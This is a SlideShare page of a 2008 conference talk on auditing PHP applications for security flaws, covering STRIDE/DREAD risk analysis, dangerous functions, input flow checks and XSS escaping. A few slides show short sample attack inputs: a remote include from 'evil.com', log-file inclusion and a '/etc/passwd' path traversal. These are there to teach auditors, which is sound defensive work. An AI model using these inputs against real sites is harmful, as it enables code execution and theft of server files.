Johann-Peter Hartmann, profile picture
Uploaded byJohann-Peter Hartmann
KEY, PDF2,674 views

Do it-yourself-audits

The document discusses do-it-yourself security audits for PHP applications. It recommends focusing audits on high risk areas by analyzing data flows for STRIDE risks like spoofing, tampering, and information disclosure. The document outlines tools and techniques for analyzing things like SQL injections, code executions, input validation, and cross-site scripting vulnerabilities. It recommends using input flow analysis or checking critical functions and output escaping to efficiently audit applications. While tools can assist, thorough manual code reviews are still needed to identify security issues.

Embed presentation

Download to read offline
Do-It-Yourself Audits Dutch PHP Conference Amsterdam 2008
The bald guy in the front
The bald guy in the front Johann-Peter Hartmann Full-time PHP Developer since 3.0.4 loves LAMP the great people, it‘s fun. Security is just fun CTO and Founder of Mayflower GmbH CEO of SektionEins GmbH
Our Business Model Mayflower GmbH : Create insecure Software
Our Business Model Mayflower GmbH : Create insecure Software SektionEins GmbH : Fix it
Our Business Model Mayflower GmbH : Create insecure Software SektionEins GmbH : Fix it = Get paid twice.
Agenda State of Security for PHP Risk Analysis White Box Audits Input flow analysis Tools to help you
PHP and Security
33 % 67 % Profit Fun Source: Breach 2007
3 % 3 % 1 %1 % 3 % 8 % 42 % 15 % Information theft Defacement Malware Unknown Fraud 23 % Blackmail Link Spam Worms Source: Breach 2007 Phishing Information Warfare
2 % 3 % 2 % 2 % 20 % 3 % 3 % 3 % 8 % SQL Injection 17 % Information Disclosure 10 % Known Exploits XSS Missing Authentication 12 % Guessing of Logins/Sessions 15 % OS Code Execution Wrong configurations Missing Anti-Automation Denial Of Service Redirect Source: NSI 2006 Wrong Session-Timeout CSRF
Risk Analysis
Why do it, anyway? Best way: verify the whole application Second best: audit the whole source code Average: 2000 LOC/Day More than one year for a 500.000 LOC application. Marco just told me that he got a 3.000.000 LOC application
Better not audit everything.
Check Data Flows for STRIDE Check every data exchange point for
Check Data Flows for STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids)
Check Data Flows for STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF)
Check Data Flows for STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage)
Check Data Flows for STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage) Information Disclosure (SQL-Injections, XSS, ...)
Check Data Flows for STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage) Information Disclosure (SQL-Injections, XSS, ...) Denial of service (Logout after 3 failed logins)
Check Data Flows for STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage) Information Disclosure (SQL-Injections, XSS, ...) Denial of service (Logout after 3 failed logins) Elevation of Privileges (Code executions ...)
How to Analyze Risks
How to Analyze Risks External Entities: Spoofing, Repudiation
How to Analyze Risks Processes: Spoofing, Tampering, Repudiation, Information Disclosure, DoS, Elevation of Privileges
How to Analyze Risks Database: Tampering, Information Disclosure, DoS
How to Analyze Risks Data flow: Tampering, Information Disclosure, DoS
How to Analyze Risks
Now what‘s the absolute risk? Check out the DREAD for every risk: Damage Potential Reproducability Exploitablitity Affected Users Discoverability
Where start auditing?
Where start auditing? risk = chance of attack * damage potential
Where start auditing? risk = chance of attack * damage potential High risk example: SQL-Injection in a Login Form
Tools needed for manual Source Code Audits Some people say: you just need „grep“ A decent Code Browser with syntax highlightening good code navigation Dynamic Code Analysis: Debugger with Step Thru Variable Introspection, Conditional Breakpoints
Critical Function Analysis Some functions are more dangerous than other methods. Every exploit class got its own set of functions think of: SQL Injections, Code Executions So just search for every critical function and check if the parameters are escaped correctly
SQL Injections Functions: mysql_query, mysqli_query, pdo::query, ... Your own database abstraction layer What to check Are the parameters correctly escaped? Even numbers, sort orders and directions? Table and Column names? look out for proper escaping of values, column names and sort orders etc
Code Executions Functions: eval(), create_function(), preg_replace with modifier e, usort, uasort, *_callback functions Written and included code: Templates in Smarty Cache data Look out for: (external) variables in php-code Strings can contain code executions! “{${phpinfo}}“
Code Inclusions Functions (include|require)[_once] Local: include “/var/log/http/access.log“ with my referer Remote: include “http://evil.com/hack.gif“ Other: “ftp://..“, “php://input...“, “data://...“ allow_url_fopen does not protect against data and php!
Shell Executions Functions: shell_exec (BackTicks!), exec(), system(), popen(), passthru() mail()! binary name and arguments need to be escaped Check for existance of escape_shell_cmd and escape_shell_args
Information leakage Functions: fopen(), fread(), file(), ... Vulnerabilities: read local files containing database passwords read intranet URLs read local server configuration files Check for injection of „/../../etc/passwd%00“
Input Flow Analysis Check the way that variables take inside the application Faster than a critical function analysis PHP accepts every external variable by default The variables are from an untrusted environment As soon PHP got a taint mode, PHP does help you a lot
Input Flow Analysis $_GET, $_POST, $_COOKIE some $_SERVER variables! Don‘t trust $HTTP_HOST. register_globals makes it hard to follow Check if external variables or results of them are used in critical functions
XSS: Output Escaping check Check for every place where data is delivered to the user There are 5 different versions of escaping for XSS
XSS: Output Escaping check Check for every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities()
XSS: Output Escaping check Check for every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars()
XSS: Output Escaping check Check for every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars() URLs: urlencode()
XSS: Output Escaping check Check for every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars() URLs: urlencode() JavaScript- and Stylesheet-Strings: addcslashes()
XSS: Output Escaping check Check for every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars() URLs: urlencode() JavaScript- and Stylesheet-Strings: addcslashes() HTML: Whitelist-Filters like htmlpurifier
Tools for Static Analysis RATS: http://www.fortifysoftware.com/security- resources/rats.jsp finds simple bugs like TOCTOU PHP-SAT http://www.program-transformation.org/ PHP/PhpSat got a freely definable set of rules for security checks Armorize CodeSecure http://www.armorize.com/ HyperSource, Fortify
Other tools XSSS for automated XSS search http://www.sven.de/XSSS A lot of other web security scanners SPIDynamics WebInspect NStalker Chorizo does PHP gray box scanning .. a lot more
Summary Even if you have time to do a full code review use risk analysis to focus Code review: Use critical function analysis and output check or input flow analysis Tools can help you, but they don‘t do your job
Questions?
Questions? Contact me at: johann-peter.hartmann@sektioneins.de

More Related Content

PDF
Web Application Security
bySiarhei Barysiuk
 
PDF
Are There Any Domains Impersonating Your Company For Phishing?
byNormShield
 
PDF
One Shot Eight Bank
bySenad Aruc
 
PPT
Web Application Security - "In theory and practice"
byJeremiah Grossman
 
PPT
CSRF_RSA_2008_Jeremiah_Grossman
byguestdb261a
 
PDF
IRJET- Detecting Malicious URLS using Machine Learning Techniques: A Comp...
byIRJET Journal
 
PDF
Web Security 101
byMichael Peters
 
PDF
Classification Model to Detect Malicious URL via Behaviour Analysis
byEditor IJCATR
 
Web Application Security
bySiarhei Barysiuk
 
Are There Any Domains Impersonating Your Company For Phishing?
byNormShield
 
One Shot Eight Bank
bySenad Aruc
 
Web Application Security - "In theory and practice"
byJeremiah Grossman
 
CSRF_RSA_2008_Jeremiah_Grossman
byguestdb261a
 
IRJET- Detecting Malicious URLS using Machine Learning Techniques: A Comp...
byIRJET Journal
 
Web Security 101
byMichael Peters
 
Classification Model to Detect Malicious URL via Behaviour Analysis
byEditor IJCATR
 

What's hot

PPT
Web security presentation
byJohn Staveley
 
PDF
Implementing a comprehensive application security progaram - Tawfiq
byOWASP-Qatar Chapter
 
PDF
Rich Web App Security - Keeping your application safe
byJeremiah Grossman
 
PPTX
Phishing attack, with SSL Encryption and HTTPS Working
bySachin Saini
 
PPT
Strategies to handle Phishing attacks
bySreejith.D. Menon
 
ODP
phishing and pharming - evil twins
byNilantha Piyasiri
 
PDF
Safeguarding PeopleSoft Against Direct Deposit Theft
byAppsian
 
PPTX
Phishing attack till now
byelakkiya poongunran
 
PPTX
Anatomy of a Spear Phishing Attack
byMark Mair
 
PPTX
PHISHING PROJECT REPORT
byvineetkathan
 
PPTX
Malicious Url Detection Using Machine Learning
bysecurityxploded
 
PPTX
A8 cross site request forgery (csrf) it 6873 presentation
byAlbena Asenova-Belal
 
PDF
IRJET - Secure Banking Application with Image and GPS Location
byIRJET Journal
 
PPT
Security 101
byGeorge V. Reilly
 
PPT
Phishing
byoitaoming
 
PPTX
Anti phishing
byShethwala Ridhvesh
 
PDF
Introduction to Cross Site Scripting ( XSS )
byIrfad Imtiaz
 
PDF
Phishing exposed
bytamfin
 
PPT
Cross Site Request Forgery Vulnerabilities
byMarco Morana
 
PPTX
The Difference between Pharming and Phishing
byMason Bird
 
Web security presentation
byJohn Staveley
 
Implementing a comprehensive application security progaram - Tawfiq
byOWASP-Qatar Chapter
 
Rich Web App Security - Keeping your application safe
byJeremiah Grossman
 
Phishing attack, with SSL Encryption and HTTPS Working
bySachin Saini
 
Strategies to handle Phishing attacks
bySreejith.D. Menon
 
phishing and pharming - evil twins
byNilantha Piyasiri
 
Safeguarding PeopleSoft Against Direct Deposit Theft
byAppsian
 
Phishing attack till now
byelakkiya poongunran
 
Anatomy of a Spear Phishing Attack
byMark Mair
 
PHISHING PROJECT REPORT
byvineetkathan
 
Malicious Url Detection Using Machine Learning
bysecurityxploded
 
A8 cross site request forgery (csrf) it 6873 presentation
byAlbena Asenova-Belal
 
IRJET - Secure Banking Application with Image and GPS Location
byIRJET Journal
 
Security 101
byGeorge V. Reilly
 
Phishing
byoitaoming
 
Anti phishing
byShethwala Ridhvesh
 
Introduction to Cross Site Scripting ( XSS )
byIrfad Imtiaz
 
Phishing exposed
bytamfin
 
Cross Site Request Forgery Vulnerabilities
byMarco Morana
 
The Difference between Pharming and Phishing
byMason Bird
 

Similar to Do it-yourself-audits

PDF
Do You Write Secure Code? by Erez Metula
byAlphageeks
 
PPTX
How to Test for The OWASP Top Ten
bySecurity Innovation
 
PDF
Code securely
byMaksym Hopei
 
PDF
Common Web Application Attacks
byAhmed Sherif
 
PPTX
Hardening Enterprise Apache
byguestd9aa5
 
PDF
Web Security
byKHOANGUYNNGANH
 
PDF
WhiteHat Security "Website Security Statistics Report" (Q1'09)
byJeremiah Grossman
 
PPTX
Php security common 2011
by10n Software, LLC
 
PPTX
State of the information security nation
bySensePost
 
PDF
Web Application Scanning 101
bySasha Nunke
 
PDF
How to code securely: a crash course for non-coders
byJaap Karan Singh
 
PPT
Securing Applications
byBurak DAYIOGLU
 
PPTX
Open Source Security
bySander Temme
 
PDF
Injecting simplicity not SQL RSA Europe 2010
bySecurity Ninja
 
PPTX
Best practices of web app security (samvel gevorgyan)
byClubHack
 
PPTX
Securing the Web @RivieraDev2016
bySumanth Damarla
 
PPT
Hacking web applications
byphanleson
 
PDF
Injecting simplicity not SQL BSides Las Vegas 2010
bySecurity Ninja
 
PDF
OWASP TOP 10 by Team xbios
byVi Vek
 
PDF
Security Awareness
byLucas Hendrich
 
Do You Write Secure Code? by Erez Metula
byAlphageeks
 
How to Test for The OWASP Top Ten
bySecurity Innovation
 
Code securely
byMaksym Hopei
 
Common Web Application Attacks
byAhmed Sherif
 
Hardening Enterprise Apache
byguestd9aa5
 
Web Security
byKHOANGUYNNGANH
 
WhiteHat Security "Website Security Statistics Report" (Q1'09)
byJeremiah Grossman
 
Php security common 2011
by10n Software, LLC
 
State of the information security nation
bySensePost
 
Web Application Scanning 101
bySasha Nunke
 
How to code securely: a crash course for non-coders
byJaap Karan Singh
 
Securing Applications
byBurak DAYIOGLU
 
Open Source Security
bySander Temme
 
Injecting simplicity not SQL RSA Europe 2010
bySecurity Ninja
 
Best practices of web app security (samvel gevorgyan)
byClubHack
 
Securing the Web @RivieraDev2016
bySumanth Damarla
 
Hacking web applications
byphanleson
 
Injecting simplicity not SQL BSides Las Vegas 2010
bySecurity Ninja
 
OWASP TOP 10 by Team xbios
byVi Vek
 
Security Awareness
byLucas Hendrich
 

More from Johann-Peter Hartmann

PPTX
The End of my Career
byJohann-Peter Hartmann
 
PDF
E-Commerce vs Architektur CodeTalks.Commerce_2018
byJohann-Peter Hartmann
 
PDF
DevOps beyond the Tools
byJohann-Peter Hartmann
 
PDF
Warum die it nicht um new work herumkommt
byJohann-Peter Hartmann
 
PDF
Legacy php - Sanieren oder Ablösen?
byJohann-Peter Hartmann
 
PDF
RoofTop Brains & BBQ: Ein Gästbuch für China
byJohann-Peter Hartmann
 
PDF
Die Architektur, die man kann
byJohann-Peter Hartmann
 
PDF
NewWork in der Praxis
byJohann-Peter Hartmann
 
PDF
Von Kutschern, Managern und Systemadministratoren
byJohann-Peter Hartmann
 
PDF
Das Ende der Karriere
byJohann-Peter Hartmann
 
PDF
DevOps jenseits der Tools
byJohann-Peter Hartmann
 
PDF
Reparier Deine Unternehmenskultur!
byJohann-Peter Hartmann
 
PDF
Lügen, schlimme Lügen und IT-Verträge
byJohann-Peter Hartmann
 
PDF
How not to screw the operating system of your startup
byJohann-Peter Hartmann
 
PDF
Einfangen eines technisch kaputten projektes
byJohann-Peter Hartmann
 
PDF
Agile versus Management WJAX 2014
byJohann-Peter Hartmann
 
PDF
Leadership in der IT
byJohann-Peter Hartmann
 
PDF
Vom Entwickler zur Führungskraft
byJohann-Peter Hartmann
 
PDF
Erfolgreiche rewrites
byJohann-Peter Hartmann
 
PDF
Surviving Complexity
byJohann-Peter Hartmann
 
The End of my Career
byJohann-Peter Hartmann
 
E-Commerce vs Architektur CodeTalks.Commerce_2018
byJohann-Peter Hartmann
 
DevOps beyond the Tools
byJohann-Peter Hartmann
 
Warum die it nicht um new work herumkommt
byJohann-Peter Hartmann
 
Legacy php - Sanieren oder Ablösen?
byJohann-Peter Hartmann
 
RoofTop Brains & BBQ: Ein Gästbuch für China
byJohann-Peter Hartmann
 
Die Architektur, die man kann
byJohann-Peter Hartmann
 
NewWork in der Praxis
byJohann-Peter Hartmann
 
Von Kutschern, Managern und Systemadministratoren
byJohann-Peter Hartmann
 
Das Ende der Karriere
byJohann-Peter Hartmann
 
DevOps jenseits der Tools
byJohann-Peter Hartmann
 
Reparier Deine Unternehmenskultur!
byJohann-Peter Hartmann
 
Lügen, schlimme Lügen und IT-Verträge
byJohann-Peter Hartmann
 
How not to screw the operating system of your startup
byJohann-Peter Hartmann
 
Einfangen eines technisch kaputten projektes
byJohann-Peter Hartmann
 
Agile versus Management WJAX 2014
byJohann-Peter Hartmann
 
Leadership in der IT
byJohann-Peter Hartmann
 
Vom Entwickler zur Führungskraft
byJohann-Peter Hartmann
 
Erfolgreiche rewrites
byJohann-Peter Hartmann
 
Surviving Complexity
byJohann-Peter Hartmann
 

Do it-yourself-audits

  • 1.
    Do-It-Yourself Audits Dutch PHPConference Amsterdam 2008
  • 2.
    The bald guyin the front
  • 3.
    The bald guyin the front Johann-Peter Hartmann Full-time PHP Developer since 3.0.4 loves LAMP the great people, it‘s fun. Security is just fun CTO and Founder of Mayflower GmbH CEO of SektionEins GmbH
  • 4.
    Our Business Model MayflowerGmbH : Create insecure Software
  • 5.
    Our Business Model MayflowerGmbH : Create insecure Software SektionEins GmbH : Fix it
  • 6.
    Our Business Model MayflowerGmbH : Create insecure Software SektionEins GmbH : Fix it = Get paid twice.
  • 7.
    Agenda State of Securityfor PHP Risk Analysis White Box Audits Input flow analysis Tools to help you
  • 8.
  • 10.
    33 % 67 % Profit Fun Source: Breach 2007
  • 11.
    3 % 3 % 1 %1 % 3 % 8 % 42 % 15 % Information theft Defacement Malware Unknown Fraud 23 % Blackmail Link Spam Worms Source: Breach 2007 Phishing Information Warfare
  • 12.
    2 % 3 % 2 % 2 % 20 % 3 % 3 % 3 % 8 % SQL Injection 17 % Information Disclosure 10 % Known Exploits XSS Missing Authentication 12 % Guessing of Logins/Sessions 15 % OS Code Execution Wrong configurations Missing Anti-Automation Denial Of Service Redirect Source: NSI 2006 Wrong Session-Timeout CSRF
  • 13.
  • 14.
    Why do it,anyway? Best way: verify the whole application Second best: audit the whole source code Average: 2000 LOC/Day More than one year for a 500.000 LOC application. Marco just told me that he got a 3.000.000 LOC application
  • 15.
    Better not auditeverything.
  • 16.
    Check Data Flowsfor STRIDE Check every data exchange point for
  • 17.
    Check Data Flowsfor STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids)
  • 18.
    Check Data Flowsfor STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF)
  • 19.
    Check Data Flowsfor STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage)
  • 20.
    Check Data Flowsfor STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage) Information Disclosure (SQL-Injections, XSS, ...)
  • 21.
    Check Data Flowsfor STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage) Information Disclosure (SQL-Injections, XSS, ...) Denial of service (Logout after 3 failed logins)
  • 22.
    Check Data Flowsfor STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage) Information Disclosure (SQL-Injections, XSS, ...) Denial of service (Logout after 3 failed logins) Elevation of Privileges (Code executions ...)
  • 23.
  • 24.
    How to AnalyzeRisks External Entities: Spoofing, Repudiation
  • 25.
    How to AnalyzeRisks Processes: Spoofing, Tampering, Repudiation, Information Disclosure, DoS, Elevation of Privileges
  • 26.
    How to AnalyzeRisks Database: Tampering, Information Disclosure, DoS
  • 27.
    How to AnalyzeRisks Data flow: Tampering, Information Disclosure, DoS
  • 28.
  • 29.
    Now what‘s theabsolute risk? Check out the DREAD for every risk: Damage Potential Reproducability Exploitablitity Affected Users Discoverability
  • 30.
  • 31.
    Where start auditing? risk= chance of attack * damage potential
  • 32.
    Where start auditing? risk= chance of attack * damage potential High risk example: SQL-Injection in a Login Form
  • 34.
    Tools needed formanual Source Code Audits Some people say: you just need „grep“ A decent Code Browser with syntax highlightening good code navigation Dynamic Code Analysis: Debugger with Step Thru Variable Introspection, Conditional Breakpoints
  • 35.
    Critical Function Analysis Some functions are more dangerous than other methods. Every exploit class got its own set of functions think of: SQL Injections, Code Executions So just search for every critical function and check if the parameters are escaped correctly
  • 36.
    SQL Injections Functions: mysql_query,mysqli_query, pdo::query, ... Your own database abstraction layer What to check Are the parameters correctly escaped? Even numbers, sort orders and directions? Table and Column names? look out for proper escaping of values, column names and sort orders etc
  • 37.
    Code Executions Functions: eval(), create_function(), preg_replace with modifier e, usort, uasort, *_callback functions Written and included code: Templates in Smarty Cache data Look out for: (external) variables in php-code Strings can contain code executions! “{${phpinfo}}“
  • 38.
    Code Inclusions Functions (include|require)[_once] Local: include“/var/log/http/access.log“ with my referer Remote: include “http://evil.com/hack.gif“ Other: “ftp://..“, “php://input...“, “data://...“ allow_url_fopen does not protect against data and php!
  • 39.
    Shell Executions Functions: shell_exec (BackTicks!), exec(), system(), popen(), passthru() mail()! binary name and arguments need to be escaped Check for existance of escape_shell_cmd and escape_shell_args
  • 40.
    Information leakage Functions:fopen(), fread(), file(), ... Vulnerabilities: read local files containing database passwords read intranet URLs read local server configuration files Check for injection of „/../../etc/passwd%00“
  • 41.
    Input Flow Analysis Check the way that variables take inside the application Faster than a critical function analysis PHP accepts every external variable by default The variables are from an untrusted environment As soon PHP got a taint mode, PHP does help you a lot
  • 42.
    Input Flow Analysis $_GET, $_POST, $_COOKIE some $_SERVER variables! Don‘t trust $HTTP_HOST. register_globals makes it hard to follow Check if external variables or results of them are used in critical functions
  • 43.
    XSS: Output Escaping check Checkfor every place where data is delivered to the user There are 5 different versions of escaping for XSS
  • 44.
    XSS: Output Escaping check Checkfor every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities()
  • 45.
    XSS: Output Escaping check Checkfor every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars()
  • 46.
    XSS: Output Escaping check Checkfor every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars() URLs: urlencode()
  • 47.
    XSS: Output Escaping check Checkfor every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars() URLs: urlencode() JavaScript- and Stylesheet-Strings: addcslashes()
  • 48.
    XSS: Output Escaping check Checkfor every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars() URLs: urlencode() JavaScript- and Stylesheet-Strings: addcslashes() HTML: Whitelist-Filters like htmlpurifier
  • 49.
    Tools for StaticAnalysis RATS: http://www.fortifysoftware.com/security- resources/rats.jsp finds simple bugs like TOCTOU PHP-SAT http://www.program-transformation.org/ PHP/PhpSat got a freely definable set of rules for security checks Armorize CodeSecure http://www.armorize.com/ HyperSource, Fortify
  • 50.
    Other tools XSSSfor automated XSS search http://www.sven.de/XSSS A lot of other web security scanners SPIDynamics WebInspect NStalker Chorizo does PHP gray box scanning .. a lot more
  • 51.
    Summary Even if youhave time to do a full code review use risk analysis to focus Code review: Use critical function analysis and output check or input flow analysis Tools can help you, but they don‘t do your job
  • 52.
  • 53.
    Questions? Contact me at: johann-peter.hartmann@sektioneins.de

Editor's Notes